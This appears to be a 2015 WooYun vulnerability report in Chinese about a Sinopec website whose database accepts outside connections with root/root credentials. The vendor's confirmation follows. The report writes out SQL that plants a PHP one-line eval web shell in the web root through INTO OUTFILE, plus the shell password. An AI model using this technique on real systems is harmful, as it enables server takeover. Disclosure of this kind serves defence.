漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0166000
漏洞标题:中石化某站敏感信息泄漏(数据库外连+可getshell)
相关厂商:中国石油化工股份有限公司
漏洞作者: 牛 小 帅
提交时间:2015-12-30 12:29
修复时间:2016-02-12 18:49
公开时间:2016-02-12 18:49
漏洞类型:敏感信息泄露
危害等级:高
自评Rank:18
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-30: 细节已通知厂商并且等待厂商处理中
2015-12-30: 厂商已经确认,细节仅向厂商公开
2016-01-09: 细节向核心白帽子及相关领域专家公开
2016-01-19: 细节向普通白帽子公开
2016-01-29: 细节向实习白帽子公开
2016-02-12: 细节向公众公开
简要描述:
中石化某站敏感信息泄漏(数据库外连+可getshell)
详细说明:
用户:root
密码:root
连接后是phpmyamdin
大量用户吧,admin我都解密了,但是登入地址没找着
来看根目录
==============================================================
我理想getshell类型,因为第一次接触这种实际环境,不敢贸然执行,下面是我想执行的
根目录是:D:/phpStudy/WWW
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
SELECT xiaomaFROM study INTO OUTFILE 'D:/phpStudy/WWW /7.php';
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到D:/phpStudy/WWW/7.php
一句话连接密码:xiaoma
=========================================
漏洞证明:
修复方案:
版权声明:转载请注明来源 牛 小 帅@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:5
确认时间:2015-12-30 14:20
厂商回复:
谢谢!我们会尽快处理。
最新状态:
暂无